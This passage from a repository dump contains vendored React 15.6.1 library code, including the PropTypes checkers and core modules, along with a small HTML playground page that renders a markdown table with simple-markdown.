createAnyTypeChecker(),\n    arrayOf: createArrayOfTypeChecker,\n    element: createElementTypeChecker(),\n    instanceOf: createInstanceTypeChecker,\n    node: createNodeChecker(),\n    objectOf: createObjectOfTypeChecker,\n    oneOf: createEnumTypeChecker,\n    oneOfType: createUnionTypeChecker,\n    shape: createShapeTypeChecker\n  };\n\n  /**\n   * inlined Object.is polyfill to avoid requiring consumers ship their own\n   * https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/is\n   */\n  /*eslint-disable no-self-compare*/\n  function is(x, y) {\n    // SameValue algorithm\n    if (x === y) {\n      // Steps 1-5, 7-10\n      // Steps 6.b-6.e: +0 != -0\n      return x !== 0 || 1 / x === 1 / y;\n    } else {\n      // Step 6.a: NaN == NaN\n      return x !== x && y !== y;\n    }\n  }\n  /*eslint-enable no-self-compare*/\n\n  /**\n   * We use an Error-like object for backward compatibility as people may call\n   * PropTypes directly and inspect their output. However, we don't use real\n   * Errors anymore. We don't inspect their stack anyway, and creating them\n   * is prohibitively expensive if they are created too often, such as what\n   * happens in oneOfType() for any type before the one that matched.\n   */\n  function PropTypeError(message) {\n    this.message = message;\n    this.stack = '';\n  }\n  // Make `instanceof Error` still work for returned errors.\n  PropTypeError.prototype = Error.prototype;\n\n  function createChainableTypeChecker(validate) {\n    if (\"development\" !== 'production') {\n      var manualPropTypeCallCache = {};\n      var manualPropTypeWarningCount = 0;\n    }\n    function checkType(isRequired, props, propName, componentName, location, propFullName, secret) {\n      componentName = componentName || ANONYMOUS;\n      propFullName = propFullName || propName;\n\n      if (secret !== ReactPropTypesSecret) {\n        if (throwOnDirectAccess) {\n          // New behavior only for users of `prop-types` package\n          invariant(\n            false,\n            'Calling PropTypes validators directly is not supported by the `prop-types` package. ' +\n            'Use `PropTypes.checkPropTypes()` to call them. ' +\n            'Read more at http://fb.me/use-check-prop-types'\n          );\n        } else if (\"development\" !== 'production' && typeof console !== 'undefined') {\n          // Old behavior for people using React.PropTypes\n          var cacheKey = componentName + ':' + propName;\n          if (\n            !manualPropTypeCallCache[cacheKey] &&\n            // Avoid spamming the console because they are often not actionable except for lib authors\n            manualPropTypeWarningCount < 3\n          ) {\n            warning(\n              false,\n              'You are manually calling a React.PropTypes validation ' +\n              'function for the `%s` prop on `%s`. This is deprecated ' +\n              'and will throw in the standalone `prop-types` package. ' +\n              'You may be seeing this warning due to a third-party PropTypes ' +\n              'library. See https://fb.me/react-warning-dont-call-proptypes ' + 'for details.',\n              propFullName,\n              componentName\n            );\n            manualPropTypeCallCache[cacheKey] = true;\n            manualPropTypeWarningCount++;\n          }\n        }\n      }\n      if (props[propName] == null) {\n        if (isRequired) {\n          if (props[propName] === null) {\n            return new PropTypeError('The ' + location + ' `' + propFullName + '` is marked as required ' + ('in `' + componentName + '`, but its value is `null`.'));\n          }\n          return new PropTypeError('The ' + location + ' `' + propFullName + '` is marked as required in ' + ('`' + componentName + '`, but its value is `undefined`.'));\n        }\n        return null;\n      } else {\n        return validate(props, propName, componentName, location, propFullName);\n      }\n    }\n\n    var chainedCheckType = checkType.bind(null, false);\n    chainedCheckType.isRequired = checkType.bind(null, true);\n\n    return chainedCheckType;\n  }\n\n  function createPrimitiveTypeChecker(expectedType) {\n    function validate(props, propName, componentName, location, propFullName, secret) {\n      var propValue = props[propName];\n      var propType = getPropType(propValue);\n      if (propType !== expectedType) {\n        // `propValue` being instance of, say, date/regexp, pass the 'object'\n        // check, but we can offer a more precise error message here rather than\n        // 'of type `object`'.\n        var preciseType = getPreciseType(propValue);\n\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type ' + ('`' + preciseType + '` supplied to `' + componentName + '`, expected ') + ('`' + expectedType + '`.'));\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createAnyTypeChecker() {\n    return createChainableTypeChecker(emptyFunction.thatReturnsNull);\n  }\n\n  function createArrayOfTypeChecker(typeChecker) {\n    function validate(props, propName, componentName, location, propFullName) {\n      if (typeof typeChecker !== 'function') {\n        return new PropTypeError('Property `' + propFullName + '` of component `' + componentName + '` has invalid PropType notation inside arrayOf.');\n      }\n      var propValue = props[propName];\n      if (!Array.isArray(propValue)) {\n        var propType = getPropType(propValue);\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type ' + ('`' + propType + '` supplied to `' + componentName + '`, expected an array.'));\n      }\n      for (var i = 0; i < propValue.length; i++) {\n        var error = typeChecker(propValue, i, componentName, location, propFullName + '[' + i + ']', ReactPropTypesSecret);\n        if (error instanceof Error) {\n          return error;\n        }\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createElementTypeChecker() {\n    function validate(props, propName, componentName, location, propFullName) {\n      var propValue = props[propName];\n      if (!isValidElement(propValue)) {\n        var propType = getPropType(propValue);\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type ' + ('`' + propType + '` supplied to `' + componentName + '`, expected a single ReactElement.'));\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createInstanceTypeChecker(expectedClass) {\n    function validate(props, propName, componentName, location, propFullName) {\n      if (!(props[propName] instanceof expectedClass)) {\n        var expectedClassName = expectedClass.name || ANONYMOUS;\n        var actualClassName = getClassName(props[propName]);\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type ' + ('`' + actualClassName + '` supplied to `' + componentName + '`, expected ') + ('instance of `' + expectedClassName + '`.'));\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createEnumTypeChecker(expectedValues) {\n    if (!Array.isArray(expectedValues)) {\n      \"development\" !== 'production' ? warning(false, 'Invalid argument supplied to oneOf, expected an instance of array.') : void 0;\n      return emptyFunction.thatReturnsNull;\n    }\n\n    function validate(props, propName, componentName, location, propFullName) {\n      var propValue = props[propName];\n      for (var i = 0; i < expectedValues.length; i++) {\n        if (is(propValue, expectedValues[i])) {\n          return null;\n        }\n      }\n\n      var valuesString = JSON.stringify(expectedValues);\n      return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of value `' + propValue + '` ' + ('supplied to `' + componentName + '`, expected one of ' + valuesString + '.'));\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createObjectOfTypeChecker(typeChecker) {\n    function validate(props, propName, componentName, location, propFullName) {\n      if (typeof typeChecker !== 'function') {\n        return new PropTypeError('Property `' + propFullName + '` of component `' + componentName + '` has invalid PropType notation inside objectOf.');\n      }\n      var propValue = props[propName];\n      var propType = getPropType(propValue);\n      if (propType !== 'object') {\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type ' + ('`' + propType + '` supplied to `' + componentName + '`, expected an object.'));\n      }\n      for (var key in propValue) {\n        if (propValue.hasOwnProperty(key)) {\n          var error = typeChecker(propValue, key, componentName, location, propFullName + '.' + key, ReactPropTypesSecret);\n          if (error instanceof Error) {\n            return error;\n          }\n        }\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createUnionTypeChecker(arrayOfTypeCheckers) {\n    if (!Array.isArray(arrayOfTypeCheckers)) {\n      \"development\" !== 'production' ? warning(false, 'Invalid argument supplied to oneOfType, expected an instance of array.') : void 0;\n      return emptyFunction.thatReturnsNull;\n    }\n\n    for (var i = 0; i < arrayOfTypeCheckers.length; i++) {\n      var checker = arrayOfTypeCheckers[i];\n      if (typeof checker !== 'function') {\n        warning(\n          false,\n          'Invalid argument supplid to oneOfType. Expected an array of check functions, but ' +\n          'received %s at index %s.',\n          getPostfixForTypeWarning(checker),\n          i\n        );\n        return emptyFunction.thatReturnsNull;\n      }\n    }\n\n    function validate(props, propName, componentName, location, propFullName) {\n      for (var i = 0; i < arrayOfTypeCheckers.length; i++) {\n        var checker = arrayOfTypeCheckers[i];\n        if (checker(props, propName, componentName, location, propFullName, ReactPropTypesSecret) == null) {\n          return null;\n        }\n      }\n\n      return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` supplied to ' + ('`' + componentName + '`.'));\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createNodeChecker() {\n    function validate(props, propName, componentName, location, propFullName) {\n      if (!isNode(props[propName])) {\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` supplied to ' + ('`' + componentName + '`, expected a ReactNode.'));\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function createShapeTypeChecker(shapeTypes) {\n    function validate(props, propName, componentName, location, propFullName) {\n      var propValue = props[propName];\n      var propType = getPropType(propValue);\n      if (propType !== 'object') {\n        return new PropTypeError('Invalid ' + location + ' `' + propFullName + '` of type `' + propType + '` ' + ('supplied to `' + componentName + '`, expected `object`.'));\n      }\n      for (var key in shapeTypes) {\n        var checker = shapeTypes[key];\n        if (!checker) {\n          continue;\n        }\n        var error = checker(propValue, key, componentName, location, propFullName + '.' + key, ReactPropTypesSecret);\n        if (error) {\n          return error;\n        }\n      }\n      return null;\n    }\n    return createChainableTypeChecker(validate);\n  }\n\n  function isNode(propValue) {\n    switch (typeof propValue) {\n      case 'number':\n      case 'string':\n      case 'undefined':\n        return true;\n      case 'boolean':\n        return !propValue;\n      case 'object':\n        if (Array.isArray(propValue)) {\n          return propValue.every(isNode);\n        }\n        if (propValue === null || isValidElement(propValue)) {\n          return true;\n        }\n\n        var iteratorFn = getIteratorFn(propValue);\n        if (iteratorFn) {\n          var iterator = iteratorFn.call(propValue);\n          var step;\n          if (iteratorFn !== propValue.entries) {\n            while (!(step = iterator.next()).done) {\n              if (!isNode(step.value)) {\n                return false;\n              }\n            }\n          } else {\n            // Iterator will provide entry [k,v] tuples rather than values.\n            while (!(step = iterator.next()).done) {\n              var entry = step.value;\n              if (entry) {\n                if (!isNode(entry[1])) {\n                  return false;\n                }\n              }\n            }\n          }\n        } else {\n          return false;\n        }\n\n        return true;\n      default:\n        return false;\n    }\n  }\n\n  function isSymbol(propType, propValue) {\n    // Native Symbol.\n    if (propType === 'symbol') {\n      return true;\n    }\n\n    // 19.4.3.5 Symbol.prototype[@@toStringTag] === 'Symbol'\n    if (propValue['@@toStringTag'] === 'Symbol') {\n      return true;\n    }\n\n    // Fallback for non-spec compliant Symbols which are polyfilled.\n    if (typeof Symbol === 'function' && propValue instanceof Symbol) {\n      return true;\n    }\n\n    return false;\n  }\n\n  // Equivalent of `typeof` but with special handling for array and regexp.\n  function getPropType(propValue) {\n    var propType = typeof propValue;\n    if (Array.isArray(propValue)) {\n      return 'array';\n    }\n    if (propValue instanceof RegExp) {\n      // Old webkits (at least until Android 4.0) return 'function' rather than\n      // 'object' for typeof a RegExp. We'll normalize this here so that /bla/\n      // passes PropTypes.object.\n      return 'object';\n    }\n    if (isSymbol(propType, propValue)) {\n      return 'symbol';\n    }\n    return propType;\n  }\n\n  // This handles more types than `getPropType`. Only used for error messages.\n  // See `createPrimitiveTypeChecker`.\n  function getPreciseType(propValue) {\n    if (typeof propValue === 'undefined' || propValue === null) {\n      return '' + propValue;\n    }\n    var propType = getPropType(propValue);\n    if (propType === 'object') {\n      if (propValue instanceof Date) {\n        return 'date';\n      } else if (propValue instanceof RegExp) {\n        return 'regexp';\n      }\n    }\n    return propType;\n  }\n\n  // Returns a string that is postfixed to a warning about an invalid type.\n  // For example, \"undefined\" or \"of type array\"\n  function getPostfixForTypeWarning(value) {\n    var type = getPreciseType(value);\n    switch (type) {\n      case 'array':\n      case 'object':\n        return 'an ' + type;\n      case 'boolean':\n      case 'date':\n      case 'regexp':\n        return 'a ' + type;\n      default:\n        return type;\n    }\n  }\n\n  // Returns class name of the object, if any.\n  function getClassName(propValue) {\n    if (!propValue.constructor || !propValue.constructor.name) {\n      return ANONYMOUS;\n    }\n    return propValue.constructor.name;\n  }\n\n  ReactPropTypes.checkPropTypes = checkPropTypes;\n  ReactPropTypes.PropTypes = ReactPropTypes;\n\n  return ReactPropTypes;\n};\n\n},{\"144\":144,\"152\":152,\"159\":159,\"161\":161,\"164\":164}],164:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n */\n\n'use strict';\n\nvar ReactPropTypesSecret = 'SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED';\n\nmodule.exports = ReactPropTypesSecret;\n\n},{}]},{},[48])(48)\n});\n});\n"
  },
  {
    "path": "simple-markdown-playground/react.html",
    "content": "<!DOCTYPE html>\n<html>\n  <head>\n    <meta charset=\"UTF-8\" />\n    <title>Hello World</title>\n    <script src=\"react.js\"></script>\n    <script src=\"react-dom.js\"></script>\n    <script src=\"babel.min.js\"></script>\n\n    <script src=\"simple-markdown-modified.js\"></script>\n  </head>\n  <body>\n    <div id=\"root\">\n\n    </div>    \n\n    <script type=\"text/babel\">\n    var md = '|test table|column 1 | column2|'\n\n    var syntaxTree = SimpleMarkdown.defaultBlockParse(md);\n  //  console.log(JSON.stringify(syntaxTree, null, 4))\n\n      ReactDOM.render(\n        React.DOM.div(null, SimpleMarkdown.defaultOutput(syntaxTree)),\n        document.getElementById('root')\n      );\n    </script>\n  </body>\n</html>\n\n"
  },
  {
    "path": "simple-markdown-playground/react.js",
    "content": " /**\n  * React v15.6.1\n  */\n(function(f){if(typeof exports===\"object\"&&typeof module!==\"undefined\"){module.exports=f()}else if(typeof define===\"function\"&&define.amd){define([],f)}else{var g;if(typeof window!==\"undefined\"){g=window}else if(typeof global!==\"undefined\"){g=global}else if(typeof self!==\"undefined\"){g=self}else{g=this}g.React = f()}})(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require==\"function\"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error(\"Cannot find module '\"+o+\"'\");throw f.code=\"MODULE_NOT_FOUND\",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require==\"function\"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\n/**\n * Escape and wrap key so it is safe to use as a reactid\n *\n * @param {string} key to be escaped.\n * @return {string} the escaped key.\n */\n\nfunction escape(key) {\n  var escapeRegex = /[=:]/g;\n  var escaperLookup = {\n    '=': '=0',\n    ':': '=2'\n  };\n  var escapedString = ('' + key).replace(escapeRegex, function (match) {\n    return escaperLookup[match];\n  });\n\n  return '$' + escapedString;\n}\n\n/**\n * Unescape and unwrap key for human-readable display\n *\n * @param {string} key to unescape.\n * @return {string} the unescaped key.\n */\nfunction unescape(key) {\n  var unescapeRegex = /(=0|=2)/g;\n  var unescaperLookup = {\n    '=0': '=',\n    '=2': ':'\n  };\n  var keySubstring = key[0] === '.' && key[1] === '$' ? key.substring(2) : key.substring(1);\n\n  return ('' + keySubstring).replace(unescapeRegex, function (match) {\n    return unescaperLookup[match];\n  });\n}\n\nvar KeyEscapeUtils = {\n  escape: escape,\n  unescape: unescape\n};\n\nmodule.exports = KeyEscapeUtils;\n},{}],2:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(25);\n\nvar invariant = _dereq_(30);\n\n/**\n * Static poolers. Several custom versions for each potential number of\n * arguments. A completely generic pooler is easy to implement, but would\n * require accessing the `arguments` object. In each of these, `this` refers to\n * the Class itself, not an instance. If any others are needed, simply add them\n * here, or in their own files.\n */\nvar oneArgumentPooler = function (copyFieldsFrom) {\n  var Klass = this;\n  if (Klass.instancePool.length) {\n    var instance = Klass.instancePool.pop();\n    Klass.call(instance, copyFieldsFrom);\n    return instance;\n  } else {\n    return new Klass(copyFieldsFrom);\n  }\n};\n\nvar twoArgumentPooler = function (a1, a2) {\n  var Klass = this;\n  if (Klass.instancePool.length) {\n    var instance = Klass.instancePool.pop();\n    Klass.call(instance, a1, a2);\n    return instance;\n  } else {\n    return new Klass(a1, a2);\n  }\n};\n\nvar threeArgumentPooler = function (a1, a2, a3) {\n  var Klass = this;\n  if (Klass.instancePool.length) {\n    var instance = Klass.instancePool.pop();\n    Klass.call(instance, a1, a2, a3);\n    return instance;\n  } else {\n    return new Klass(a1, a2, a3);\n  }\n};\n\nvar fourArgumentPooler = function (a1, a2, a3, a4) {\n  var Klass = this;\n  if (Klass.instancePool.length) {\n    var instance = Klass.instancePool.pop();\n    Klass.call(instance, a1, a2, a3, a4);\n    return instance;\n  } else {\n    return new Klass(a1, a2, a3, a4);\n  }\n};\n\nvar standardReleaser = function (instance) {\n  var Klass = this;\n  !(instance instanceof Klass) ? \"development\" !== 'production' ? invariant(false, 'Trying to release an instance into a pool of a different type.') : _prodInvariant('25') : void 0;\n  instance.destructor();\n  if (Klass.instancePool.length < Klass.poolSize) {\n    Klass.instancePool.push(instance);\n  }\n};\n\nvar DEFAULT_POOL_SIZE = 10;\nvar DEFAULT_POOLER = oneArgumentPooler;\n\n/**\n * Augments `CopyConstructor` to be a poolable class, augmenting only the class\n * itself (statically) not adding any prototypical fields. Any CopyConstructor\n * you give this may have a `poolSize` property, and will look for a\n * prototypical `destructor` on instances.\n *\n * @param {Function} CopyConstructor Constructor that can be used to reset.\n * @param {Function} pooler Customizable pooler.\n */\nvar addPoolingTo = function (CopyConstructor, pooler) {\n  // Casting as any so that flow ignores the actual implementation and trusts\n  // it to match the type we declared\n  var NewKlass = CopyConstructor;\n  NewKlass.instancePool = [];\n  NewKlass.getPooled = pooler || DEFAULT_POOLER;\n  if (!NewKlass.poolSize) {\n    NewKlass.poolSize = DEFAULT_POOL_SIZE;\n  }\n  NewKlass.release = standardReleaser;\n  return NewKlass;\n};\n\nvar PooledClass = {\n  addPoolingTo: addPoolingTo,\n  oneArgumentPooler: oneArgumentPooler,\n  twoArgumentPooler: twoArgumentPooler,\n  threeArgumentPooler: threeArgumentPooler,\n  fourArgumentPooler: fourArgumentPooler\n};\n\nmodule.exports = PooledClass;\n},{\"25\":25,\"30\":30}],3:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(32);\n\nvar ReactBaseClasses = _dereq_(4);\nvar ReactChildren = _dereq_(5);\nvar ReactDOMFactories = _dereq_(8);\nvar ReactElement = _dereq_(9);\nvar ReactPropTypes = _dereq_(14);\nvar ReactVersion = _dereq_(17);\n\nvar createReactClass = _dereq_(20);\nvar onlyChild = _dereq_(24);\n\nvar createElement = ReactElement.createElement;\nvar createFactory = ReactElement.createFactory;\nvar cloneElement = ReactElement.cloneElement;\n\nif (\"development\" !== 'production') {\n  var lowPriorityWarning = _dereq_(23);\n  var canDefineProperty = _dereq_(18);\n  var ReactElementValidator = _dereq_(11);\n  var didWarnPropTypesDeprecated = false;\n  createElement = ReactElementValidator.createElement;\n  createFactory = ReactElementValidator.createFactory;\n  cloneElement = ReactElementValidator.cloneElement;\n}\n\nvar __spread = _assign;\nvar createMixin = function (mixin) {\n  return mixin;\n};\n\nif (\"development\" !== 'production') {\n  var warnedForSpread = false;\n  var warnedForCreateMixin = false;\n  __spread = function () {\n    lowPriorityWarning(warnedForSpread, 'React.__spread is deprecated and should not be used. Use ' + 'Object.assign directly or another helper function with similar ' + 'semantics. You may be seeing this warning due to your compiler. ' + 'See https://fb.me/react-spread-deprecation for more details.');\n    warnedForSpread = true;\n    return _assign.apply(null, arguments);\n  };\n\n  createMixin = function (mixin) {\n    lowPriorityWarning(warnedForCreateMixin, 'React.createMixin is deprecated and should not be used. ' + 'In React v16.0, it will be removed. ' + 'You can use this mixin directly instead. ' + 'See https://fb.me/createmixin-was-never-implemented for more info.');\n    warnedForCreateMixin = true;\n    return mixin;\n  };\n}\n\nvar React = {\n  // Modern\n\n  Children: {\n    map: ReactChildren.map,\n    forEach: ReactChildren.forEach,\n    count: ReactChildren.count,\n    toArray: ReactChildren.toArray,\n    only: onlyChild\n  },\n\n  Component: ReactBaseClasses.Component,\n  PureComponent: ReactBaseClasses.PureComponent,\n\n  createElement: createElement,\n  cloneElement: cloneElement,\n  isValidElement: ReactElement.isValidElement,\n\n  // Classic\n\n  PropTypes: ReactPropTypes,\n  createClass: createReactClass,\n  createFactory: createFactory,\n  createMixin: createMixin,\n\n  // This looks DOM specific but these are actually isomorphic helpers\n  // since they are just generating DOM strings.\n  DOM: ReactDOMFactories,\n\n  version: ReactVersion,\n\n  // Deprecated hook for JSX spread, don't use this for anything.\n  __spread: __spread\n};\n\nif (\"development\" !== 'production') {\n  var warnedForCreateClass = false;\n  if (canDefineProperty) {\n    Object.defineProperty(React, 'PropTypes', {\n      get: function () {\n        lowPriorityWarning(didWarnPropTypesDeprecated, 'Accessing PropTypes via the main React package is deprecated,' + ' and will be removed in  React v16.0.' + ' Use the latest available v15.* prop-types package from npm instead.' + ' For info on usage, compatibility, migration and more, see ' + 'https://fb.me/prop-types-docs');\n        didWarnPropTypesDeprecated = true;\n        return ReactPropTypes;\n      }\n    });\n\n    Object.defineProperty(React, 'createClass', {\n      get: function () {\n        lowPriorityWarning(warnedForCreateClass, 'Accessing createClass via the main React package is deprecated,' + ' and will be removed in React v16.0.' + \" Use a plain JavaScript class instead. If you're not yet \" + 'ready to migrate, create-react-class v15.* is available ' + 'on npm as a temporary, drop-in replacement. ' + 'For more info see https://fb.me/react-create-class');\n        warnedForCreateClass = true;\n        return createReactClass;\n      }\n    });\n  }\n\n  // React.DOM factories are deprecated. Wrap these methods so that\n  // invocations of the React.DOM namespace and alert users to switch\n  // to the `react-dom-factories` package.\n  React.DOM = {};\n  var warnedForFactories = false;\n  Object.keys(ReactDOMFactories).forEach(function (factory) {\n    React.DOM[factory] = function () {\n      if (!warnedForFactories) {\n        lowPriorityWarning(false, 'Accessing factories like React.DOM.%s has been deprecated ' + 'and will be removed in v16.0+. Use the ' + 'react-dom-factories package instead. ' + ' Version 1.0 provides a drop-in replacement.' + ' For more info, see https://fb.me/react-dom-factories', factory);\n        warnedForFactories = true;\n      }\n      return ReactDOMFactories[factory].apply(ReactDOMFactories, arguments);\n    };\n  });\n}\n\nmodule.exports = React;\n},{\"11\":11,\"14\":14,\"17\":17,\"18\":18,\"20\":20,\"23\":23,\"24\":24,\"32\":32,\"4\":4,\"5\":5,\"8\":8,\"9\":9}],4:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(25),\n    _assign = _dereq_(32);\n\nvar ReactNoopUpdateQueue = _dereq_(12);\n\nvar canDefineProperty = _dereq_(18);\nvar emptyObject = _dereq_(29);\nvar invariant = _dereq_(30);\nvar lowPriorityWarning = _dereq_(23);\n\n/**\n * Base class helpers for the updating state of a component.\n */\nfunction ReactComponent(props, context, updater) {\n  this.props = props;\n  this.context = context;\n  this.refs = emptyObject;\n  // We initialize the default updater but the real one gets injected by the\n  // renderer.\n  this.updater = updater || ReactNoopUpdateQueue;\n}\n\nReactComponent.prototype.isReactComponent = {};\n\n/**\n * Sets a subset of the state. Always use this to mutate\n * state. You should treat `this.state` as immutable.\n *\n * There is no guarantee that `this.state` will be immediately updated, so\n * accessing `this.state` after calling this method may return the old value.\n *\n * There is no guarantee that calls to `setState` will run synchronously,\n * as they may eventually be batched together.  You can provide an optional\n * callback that will be executed when the call to setState is actually\n * completed.\n *\n * When a function is provided to setState, it will be called at some point in\n * the future (not synchronously). It will be called with the up to date\n * component arguments (state, props, context). These values can be different\n * from this.* because your function may be called after receiveProps but before\n * shouldComponentUpdate, and this new state, props, and context will not yet be\n * assigned to this.\n *\n * @param {object|function} partialState Next partial state or function to\n *        produce next partial state to be merged with current state.\n * @param {?function} callback Called after state is updated.\n * @final\n * @protected\n */\nReactComponent.prototype.setState = function (partialState, callback) {\n  !(typeof partialState === 'object' || typeof partialState === 'function' || partialState == null) ? \"development\" !== 'production' ? invariant(false, 'setState(...): takes an object of state variables to update or a function which returns an object of state variables.') : _prodInvariant('85') : void 0;\n  this.updater.enqueueSetState(this, partialState);\n  if (callback) {\n    this.updater.enqueueCallback(this, callback, 'setState');\n  }\n};\n\n/**\n * Forces an update. This should only be invoked when it is known with\n * certainty that we are **not** in a DOM transaction.\n *\n * You may want to call this when you know that some deeper aspect of the\n * component's state has changed but `setState` was not called.\n *\n * This will not invoke `shouldComponentUpdate`, but it will invoke\n * `componentWillUpdate` and `componentDidUpdate`.\n *\n * @param {?function} callback Called after update is complete.\n * @final\n * @protected\n */\nReactComponent.prototype.forceUpdate = function (callback) {\n  this.updater.enqueueForceUpdate(this);\n  if (callback) {\n    this.updater.enqueueCallback(this, callback, 'forceUpdate');\n  }\n};\n\n/**\n * Deprecated APIs. These APIs used to exist on classic React classes but since\n * we would like to deprecate them, we're not going to move them over to this\n * modern base class. Instead, we define a getter that warns if it's accessed.\n */\nif (\"development\" !== 'production') {\n  var deprecatedAPIs = {\n    isMounted: ['isMounted', 'Instead, make sure to clean up subscriptions and pending requests in ' + 'componentWillUnmount to prevent memory leaks.'],\n    replaceState: ['replaceState', 'Refactor your code to use setState instead (see ' + 'https://github.com/facebook/react/issues/3236).']\n  };\n  var defineDeprecationWarning = function (methodName, info) {\n    if (canDefineProperty) {\n      Object.defineProperty(ReactComponent.prototype, methodName, {\n        get: function () {\n          lowPriorityWarning(false, '%s(...) is deprecated in plain JavaScript React classes. %s', info[0], info[1]);\n          return undefined;\n        }\n      });\n    }\n  };\n  for (var fnName in deprecatedAPIs) {\n    if (deprecatedAPIs.hasOwnProperty(fnName)) {\n      defineDeprecationWarning(fnName, deprecatedAPIs[fnName]);\n    }\n  }\n}\n\n/**\n * Base class helpers for the updating state of a component.\n */\nfunction ReactPureComponent(props, context, updater) {\n  // Duplicated from ReactComponent.\n  this.props = props;\n  this.context = context;\n  this.refs = emptyObject;\n  // We initialize the default updater but the real one gets injected by the\n  // renderer.\n  this.updater = updater || ReactNoopUpdateQueue;\n}\n\nfunction ComponentDummy() {}\nComponentDummy.prototype = ReactComponent.prototype;\nReactPureComponent.prototype = new ComponentDummy();\nReactPureComponent.prototype.constructor = ReactPureComponent;\n// Avoid an extra prototype jump for these methods.\n_assign(ReactPureComponent.prototype, ReactComponent.prototype);\nReactPureComponent.prototype.isPureReactComponent = true;\n\nmodule.exports = {\n  Component: ReactComponent,\n  PureComponent: ReactPureComponent\n};\n},{\"12\":12,\"18\":18,\"23\":23,\"25\":25,\"29\":29,\"30\":30,\"32\":32}],5:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar PooledClass = _dereq_(2);\nvar ReactElement = _dereq_(9);\n\nvar emptyFunction = _dereq_(28);\nvar traverseAllChildren = _dereq_(26);\n\nvar twoArgumentPooler = PooledClass.twoArgumentPooler;\nvar fourArgumentPooler = PooledClass.fourArgumentPooler;\n\nvar userProvidedKeyEscapeRegex = /\\/+/g;\nfunction escapeUserProvidedKey(text) {\n  return ('' + text).replace(userProvidedKeyEscapeRegex, '$&/');\n}\n\n/**\n * PooledClass representing the bookkeeping associated with performing a child\n * traversal. Allows avoiding binding callbacks.\n *\n * @constructor ForEachBookKeeping\n * @param {!function} forEachFunction Function to perform traversal with.\n * @param {?*} forEachContext Context to perform context with.\n */\nfunction ForEachBookKeeping(forEachFunction, forEachContext) {\n  this.func = forEachFunction;\n  this.context = forEachContext;\n  this.count = 0;\n}\nForEachBookKeeping.prototype.destructor = function () {\n  this.func = null;\n  this.context = null;\n  this.count = 0;\n};\nPooledClass.addPoolingTo(ForEachBookKeeping, twoArgumentPooler);\n\nfunction forEachSingleChild(bookKeeping, child, name) {\n  var func = bookKeeping.func,\n      context = bookKeeping.context;\n\n  func.call(context, child, bookKeeping.count++);\n}\n\n/**\n * Iterates through children that are typically specified as `props.children`.\n *\n * See https://facebook.github.io/react/docs/top-level-api.html#react.children.foreach\n *\n * The provided forEachFunc(child, index) will be called for each\n * leaf child.\n *\n * @param {?*} children Children tree container.\n * @param {function(*, int)} forEachFunc\n * @param {*} forEachContext Context for forEachContext.\n */\nfunction forEachChildren(children, forEachFunc, forEachContext) {\n  if (children == null) {\n    return children;\n  }\n  var traverseContext = ForEachBookKeeping.getPooled(forEachFunc, forEachContext);\n  traverseAllChildren(children, forEachSingleChild, traverseContext);\n  ForEachBookKeeping.release(traverseContext);\n}\n\n/**\n * PooledClass representing the bookkeeping associated with performing a child\n * mapping. Allows avoiding binding callbacks.\n *\n * @constructor MapBookKeeping\n * @param {!*} mapResult Object containing the ordered map of results.\n * @param {!function} mapFunction Function to perform mapping with.\n * @param {?*} mapContext Context to perform mapping with.\n */\nfunction MapBookKeeping(mapResult, keyPrefix, mapFunction, 